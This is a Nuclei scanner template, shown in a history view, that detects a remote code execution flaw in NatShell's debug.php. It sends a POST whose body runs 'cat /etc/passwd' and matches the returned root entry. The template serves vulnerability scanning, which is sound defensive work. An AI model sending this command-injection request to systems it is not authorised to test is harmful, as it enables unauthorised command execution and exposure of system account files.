nuclei-templates/http/vulnerabilities/other/natshell-rce.yaml

39 lines
937 B
YAML
Raw Normal View History

2021-05-28 05:42:36 +00:00
id: natshell-rce
2021-05-27 14:59:33 +00:00
info:
name: NatShell Debug File - Remote Code Execution
2021-05-27 14:59:33 +00:00
author: pikpikcu
2021-05-27 19:49:17 +00:00
severity: critical
2022-05-31 08:52:28 +00:00
description: |
The NatShell debug file is susceptible to a remote code execution vulnerability.
reference:
- https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 1
2023-10-14 11:27:55 +00:00
tags: natshell,rce
2021-05-27 14:59:33 +00:00
http:
2021-05-27 19:49:17 +00:00
- method: POST
2021-05-27 14:59:33 +00:00
path:
- "{{BaseURL}}/debug.php"
2023-10-14 11:27:55 +00:00
2021-05-27 14:59:33 +00:00
body: |
cmd=cat /etc/passwd
matchers-condition: and
matchers:
- type: regex
2022-05-31 08:52:28 +00:00
part: body
2021-05-27 14:59:33 +00:00
regex:
- "toor:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022100f62123bd1f5b60b43ed95b70c0dc52bd8041ff42ee76a4047a9d6c5fdaaca6420220162a7b02cc9eaa83e8ac595cf3ae7b0cc49d9a0b71cd318b5458f0340e0cc39f:922c64590222798bb761d5b6d8e72950